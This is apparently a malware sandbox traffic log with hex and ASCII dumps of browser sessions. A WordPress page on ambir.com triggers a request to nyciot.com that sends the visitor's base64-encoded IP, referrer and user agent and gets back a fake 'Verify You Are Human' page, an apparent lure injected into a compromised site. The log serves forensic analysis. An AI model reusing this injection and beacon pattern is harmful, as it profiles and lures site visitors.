                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 0c d6 5e f8 a0 3d 35 58 6e 55 d5 60 45 c5 06 84 77 02 c9 f7 71 64 b0 b6 32 e4 4c 1c b0 c1 f3 91 72 b7 31 e0 d2 77 04 32 58 5c 0b f3 7a 68 b0 5c db a0 c1 8a 8e 6e 08 ab 2c c9 81 85 82 d5 f3 d0 a7 3c 0b 07 ac 25 39 1b 5e dc ca a0 fb 32 98 c1 ea 01 e3 de a3 06 cb b5 dd e5 35 58 51 31 1f 61 3d 48 b2 43 a1 60 fd 09 21 93 26 30 a4 2c 0e a8 e8 f5 1b ab c0 c0 5b 16 cc 60 f1 1f 30 ad ae 06 cb 83 b7 35 58 51 31 7c 18 c2 79 88 64 e9 42 c1 aa 91 9c 9c 3c 95 05 d2 37 e3 80 3d 13 3d ee 1d 5d c1 e0 7b 32 98 c1 da b5 1c 66 d5 a7 06 cb 83 ce 1a 2c 01 5f 17 43 06 15 09 56 61 0d 71 d0 9a 04 8f 4f d8 f7 33 f8 da 04 33 58 6c 09 a3 96 af d7 60 79 51 57 83 15 1d 4d 23 06 ab d4 b1 82 d5 02 bf 5b 92 eb 2d 58 95 47 30 f8 d2 02 1a ac ac cd 30 69 30 35 58 9e fc 53 83 15 15 35 96 47
                                                                                                                                                                                              Data Ascii: ^=5XnU`Ewqd2Lr1w2X\zh\n,<%9^25XQ1a=HC`!&0,[`05XQ1|ydB<7==]{2f,_CVaqO33Xl`yQWM#[-XG00i05XS5G
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 65 f0 83 15 4f a9 56 30 af aa 05 c1 c2 54 ca 5c ee e7 32 5e de f6 58 0e d6 ac 3c 8a 94 d5 60 79 72 e3 f1 14 ac ab 60 5e e5 b1 16 04 ab 3f 65 fe 0a 17 d6 3c 46 91 33 10 cb c1 7a 9b 32 9d 34 58 9e 74 09 7e b0 6a 94 68 b0 4e 1a 67 41 b0 50 87 32 ed e0 dc 52 8a 64 8d 8f e9 60 7d 4f 91 e7 a0 c1 f2 a4 6b f0 83 f5 68 89 06 eb c4 4a 36 04 2b c5 bf 9d 6a 3b 33 28 32 18 b1 1b 2c f9 08 ff 7d 1a ac e3 3e 58 75 35 58 c5 06 0b d7 f9 76 06 ce 20 8a 24 20 a6 83 f5 15 65 d6 6a b0 a2 16 ac f3 34 58 c1 0d d6 2c 4a bb e2 50 b7 11 14 99 16 d3 c1 9a 9b 41 91 9c 35 1a ac a8 05 ab 81 06 2b b8 c1 42 4d ca fc e8 cf 2f c8 33 88 e5 60 2d 7a 5e 1c 0e 0d 56 d4 82 f5 8a 06 2b c0 c1 ea 9e 44 91 4a 71 70 62 16 65 16 c7 70 b0 96 d7 5f 48 a1 bb 35 58 d1 0b 56 2f 0d 56 80 83 85 b3 28 73 b5
                                                                                                                                                                                              Data Ascii: eOV0T\2^X<`yr`^?e<F3z24Xt~jhNgAP2Rd`}OkhJ6+j;3(2,}>Xu5Xv $ ej4X,JPA5+BM/3`-z^V+DJqpbep_H5XV/V(s
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 34 58 c7 76 01 85 fa 6b b0 fc 53 3b 4e 83 65 6b b0 4e a1 4c 2a 0a cc a1 c8 e7 1a ac 30 5e a4 d0 a7 1a 2c 1f 8d ec a4 c1 b2 34 58 a8 ed e0 5f fe ce 89 94 b8 0b 1a ac 30 5e ca a1 cc 1c 0d 96 9f 86 57 d1 60 59 1a ac 6e d5 28 be cd 6b 43 91 8a 1a ac b0 36 52 a6 b7 06 cb 57 cf 67 6b b0 ec 0c 16 56 53 e6 65 6c cf a0 44 5f 68 b0 c2 4a a3 4c 1f 0d 96 bf 6e d5 60 59 1a ac b8 5c 8a bc 86 33 28 f2 aa 06 2b bc 0f 29 93 ac c1 f2 59 3b 0d 96 9d c1 c2 79 94 e9 3b 8e 12 5f 40 83 15 de 0f 94 d9 af c1 f2 d9 35 1a 2c 4b 83 85 04 1a 34 76 89 06 cb c0 1a 56 9a 06 cb 6f ed 35 58 96 06 ab 23 0d ba 02 1a ac f0 ba 55 a2 cc 9b 1a 2c bf ad d2 60 59 1a 2c 5c 43 63 16 2e d7 60 45 70 3f 35 58 41 91 57 c1 82 60 d5 ea 3f c0 b8 49 2b 6d 0f d6 b5 34 e6 33 68 b0 22 38 4d 83 15 1c 89 16 04
                                                                                                                                                                                              Data Ascii: 4XvkS;NekNL*0^,4X_0^W`Yn(kC6RWgkVSelD_hJLn`Y\3(+)Y;y;_@5,K4vVo5X#U,`Y,\Cc.`Ep?5XAW`?I+m43h"8M
                                                                                                                                                                                              2024-11-20 20:28:25 UTC51INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 ea 5f cf 67 b8 87 b5 52 9e f9 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                              Data Ascii: _gRIENDB`


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              69192.168.2.549801141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1675OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-168be"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6836
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb0bf0f0f53-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:25 UTC878INData Raw: 37 64 63 35 0d 0a 0a 76 61 72 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 20 3d 20 7b 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 4d 6f 64 65 22 3a 7b 22 65 64 69 74 22 3a 66 61 6c 73 65 2c 22 77 70 50 72 65 76 69 65 77 22 3a 66 61 6c 73 65 2c 22 69 73 53 63 72 69 70 74 44 65 62 75 67 22 3a 66 61 6c 73 65 7d 2c 22 69 31 38 6e 22 3a 7b 22 73 68 61 72 65 4f 6e 46 61 63 65 62 6f 6f 6b 22 3a 22 53 68 61 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 22 2c 22 73 68 61 72 65 4f 6e 54 77 69 74 74 65 72 22 3a 22 53 68 61 72 65 20 6f 6e 20 54 77 69 74 74 65 72 22 2c 22 70 69 6e 49 74 22 3a 22 50 69 6e 20 69 74 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 44 6f 77 6e 6c 6f 61 64 22 2c 22 64 6f 77 6e 6c 6f 61 64 49 6d 61 67 65 22 3a 22 44 6f 77 6e 6c 6f
                                                                                                                                                                                              Data Ascii: 7dc5var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Downlo
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6f 62 69 6c 65 20 50 6f 72 74 72 61 69 74 22 2c 22 76 61 6c 75 65 22 3a 37 36 37 2c 22 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 22 3a 37 36 37 2c 22 64 69 72 65 63 74 69 6f 6e 22 3a 22 6d 61 78 22 2c 22 69 73 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 7d 2c 22 6d 6f 62 69 6c 65 5f 65 78 74 72 61 22 3a 7b 22 6c 61 62 65 6c 22 3a 22 4d 6f 62 69 6c 65 20 4c 61 6e 64 73 63 61 70 65 22 2c 22 76 61 6c 75 65 22 3a 38 38 30 2c 22 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 22 3a 38 38 30 2c 22 64 69 72 65 63 74 69 6f 6e 22 3a 22 6d 61 78 22 2c 22 69 73 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 7d 2c 22 74 61 62 6c 65 74 22 3a 7b 22 6c 61 62 65 6c 22 3a 22 54 61 62 6c 65 74 20 50 6f 72 74 72 61 69 74 22 2c 22 76 61 6c 75 65 22 3a 31 30 32 34 2c 22 64 65 66 61 75 6c 74
                                                                                                                                                                                              Data Ascii: obile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 74 69 74 6c 65 5f 73 72 63 22 3a 22 74 69 74 6c 65 22 2c 22 6c 69 67 68 74 62 6f 78 5f 64 65 73
                                                                                                                                                                                              Data Ascii: ctive_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_des
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6c 61 73 73 65 73 5b 73 5d 7c 7c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 2e 62 61 73 65 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 73 5b 6e 5d 3d 6e 65 77 20 6f 28 7b 24 65 6c 65 6d 65 6e 74 3a 65 2c 69 64 3a 6e 7d 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 39 38 30 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 73 3d 6e 28 33 32 30 33 29 2c 6f 3d 73 28 6e 28 36 33 39 37 29 29 2c 69 3d 73 28 6e 28 38 37 30 34 29 29 2c 72 3d 73 28 6e 28 34 39 38 35 29 29 2c 6c 3d 73 28 6e 28 37 35 33 37 29 29 2c 61 3d 73 28 6e 28 33 35 35 29 29 2c 64 3d 73 28 6e 28 32 38 30 34 29 29 2c 63 3d 73 28 6e 28 33 33 38 34 29 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 63 6f
                                                                                                                                                                                              Data Ascii: lasses[s]||this.documentClasses.base;this.documents[n]=new o({$element:e,id:n})}}t.default=_default},9804:(e,t,n)=>{var s=n(3203),o=s(n(6397)),i=s(n(8704)),r=s(n(4985)),l=s(n(7537)),a=s(n(355)),d=s(n(2804)),c=s(n(3384));e.exports=function(e){var t=this;co
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 74 73 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 73 65 63 74 69 6f 6e 3d 5b 64 2e 64 65 66 61 75 6c 74 2c 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 2c 61 2e 64 65 66 61 75 6c 74 2c 63 2e 64 65 66 61 75 6c 74 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 5b 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 5d 2c 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 70 75 73 68 28 2e 2e 2e 72 2e 64 65 66 61 75 6c 74 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6c 75 6d 6e 3d 6c 2e 64 65 66
                                                                                                                                                                                              Data Ascii: tsHandlers=()=>{this.elementsHandlers.section=[d.default,...i.default,a.default,c.default],this.elementsHandlers.container=[...i.default],elementorFrontend.isEditMode()&&this.elementsHandlers.container.push(...r.default),this.elementsHandlers.column=l.def
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 67 65 74 48 61 6e 64 6c 65 72 73 22 2c 22 33 2e 31 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 67 65 74 48 61 6e 64 6c 65 72 22 29 2c 65 3f 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 28 65 29 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 7d 2c 74 68 69 73 2e 72 75 6e 52 65 61 64 79 54 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 21 21 74 2e 63 6c 6f 73 65 73 74 28 27 5b 64 61 74 61 2d 64 65 6c 61
                                                                                                                                                                                              Data Ascii: this.getHandlers=function(e){return elementorDevTools.deprecation.deprecated("getHandlers","3.1.0","elementorFrontend.elementsHandler.getHandler"),e?this.getHandler(e):this.elementsHandlers},this.runReadyTrigger=function(t){const n=!!t.closest('[data-dela
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 6c 65 67 61 63 79 4d 6f 64 65 2e 65 6c 65 6d 65 6e 74 57 72 61 70 70 65 72 73 22 2c 22 33 2e 31 2e 30 22 29 2c 21 31 7d 7d 2c 74 68 69 73 2e 70 6f 70 75 6c 61 74 65 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 43 6f 6e 66 69 67 28 29 7d 67 65 74 20 4d 6f 64 75 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 70 61 72 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 4d 6f 64 75 6c 65 22 2c 22 32 2e 35 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f 6e 74 65 6e 64 2e 68 61 6e 64 6c 65 72 73 2e 42
                                                                                                                                                                                              Data Ascii: rontend.config.legacyMode.elementWrappers","3.1.0"),!1}},this.populateActiveBreakpointsConfig()}get Module(){return this.isEditMode()&&parent.elementorDevTools.deprecation.deprecated("elementorFrontend.Module","2.5.0","elementorModules.frontend.handlers.B
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 74 68 69 73 2e 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 74 2c 6e 29 3b 63 6f 6e 73 74 20 73 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 67 65 74 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 4c 69 73 74 28 7b 6c 61 72 67 65 54 6f 53 6d 61 6c 6c 3a 21 30 2c 77 69 74 68 44 65 73 6b 74 6f 70 3a 21 30 7d 29 3b 6c 65 74 20 6f 3d 73 2e 69 6e 64 65 78 4f 66 28 65 29 3b 66 6f 72 28 3b 6f 3e 30 3b 29 7b 63 6f 6e 73 74 20 65 3d 74 5b 6e 2b 22 5f 22 2b 73 5b 6f 5d 5d 3b 69 66 28 65 7c 7c 30 3d 3d 3d 65 29 72 65 74 75 72 6e 20 65 3b 6f 2d 2d 7d 72 65 74 75 72 6e 20 74 5b 6e 5d 7d 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 2b 22 5f
                                                                                                                                                                                              Data Ascii: this.getWidescreenSetting(t,n);const s=elementorFrontend.breakpoints.getActiveBreakpointsList({largeToSmall:!0,withDesktop:!0});let o=s.indexOf(e);for(;o>0;){const e=t[n+"_"+s[o]];if(e||0===e)return e;o--}return t[n]}getWidescreenSetting(e,t){const n=t+"_
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 66 69 6e 64 28 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 73 65 6c 65 63 74 6f 72 73 2e 61 64 6d 69 6e 42 61 72 22 29 29 7d 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 65 2c 74 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 72 2e 64 65 66 61 75 6c 74 29 29 74 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 64 64 43 6c 61 73 73 28 22 65 2d 2d 75 61 2d 22 2b 65 29 7d 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 74 74 72 28 22 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 64 65 76 69 63 65 2d 6d 6f 64 65 22 2c 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 44 65 76 69 63 65 4d 6f 64 65 28 29
                                                                                                                                                                                              Data Ascii: find(this.getSettings("selectors.adminBar"))}addUserAgentClasses(){for(const[e,t]of Object.entries(r.default))t&&this.elements.$body.addClass("e--ua-"+e)}setDeviceModeData(){this.elements.$body.attr("data-elementor-device-mode",this.getCurrentDeviceMode()
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 48 61 6e 64 6c 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 2c 74 68 69 73 2e 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 2c 74 68 69 73 2e 69 6e 69 74 44 69 61 6c 6f 67 73 4d 61 6e 61 67 65 72 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 6d 75 74 65 4d 69 67 72 61 74 69 6f 6e 54 72 61 63 65 73 28 29 2c 70 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2c 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 29 2c 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 2c 74 68 69 73 2e 69 6e 69 74 4f 6e 52 65 61 64 79 45 6c 65
                                                                                                                                                                                              Data Ascii: ,this.modulesHandlers={},this.addUserAgentClasses(),this.setDeviceModeData(),this.initDialogsManager(),this.isEditMode()&&this.muteMigrationTraces(),p.default.dispatch(this.elements.$window,"elementor/frontend/init"),this.initModules(),this.initOnReadyEle


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              70192.168.2.54980545.61.136.1964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC849OUTGET /js.php?device=windows&ip=OC40Ni4xMjMuNzU=&refferer=aHR0cHM6Ly9hbWJpci5jb20vYW1iaXItY2FyZC1zY2FubmVycy8=&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzExNy4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9ueWNpb3QuY29t&loc=VVM=&is_ajax=1 HTTP/1.1
                                                                                                                                                                                              Host: nyciot.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:27 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: max-age=604800, public
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              2024-11-20 20:28:27 UTC7925INData Raw: 33 64 38 61 0d 0a 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 56 65 72 69 66 79 20 59 6f 75 20 41 72 65 20 48 75 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e
                                                                                                                                                                                              Data Ascii: 3d8a <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Verify You Are Human</title> <link rel="stylesheet" href="https://cdnjs.
                                                                                                                                                                                              2024-11-20 20:28:27 UTC7835INData Raw: 38 37 33 22 3e 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 09 09 09 3c 73 70 61 6e 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 20 2d 20 3c 2f 73 70 61 6e 3e 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 22 3e 54 65 72 6d 73 3c 2f 61 3e 09 09 09 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 76 65 72 69 66 79 2d 77 69 6e 64 6f 77 22 20 63 6c 61 73 73 3d 22 78
                                                                                                                                                                                              Data Ascii: 873"><a href="#" style="text-decoration:none;color: #555;">Privacy</a><span aria-hidden="true" role="presentation"> - </span><a href="#" style="text-decoration:none;color: #555;">Terms</a></div> <div id="verify-window" class="x
                                                                                                                                                                                              2024-11-20 20:28:27 UTC2INData Raw: 0d 0a
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              2024-11-20 20:28:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              71192.168.2.549806104.16.124.964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:25 UTC355OUTGET /cdn-cgi/trace HTTP/1.1
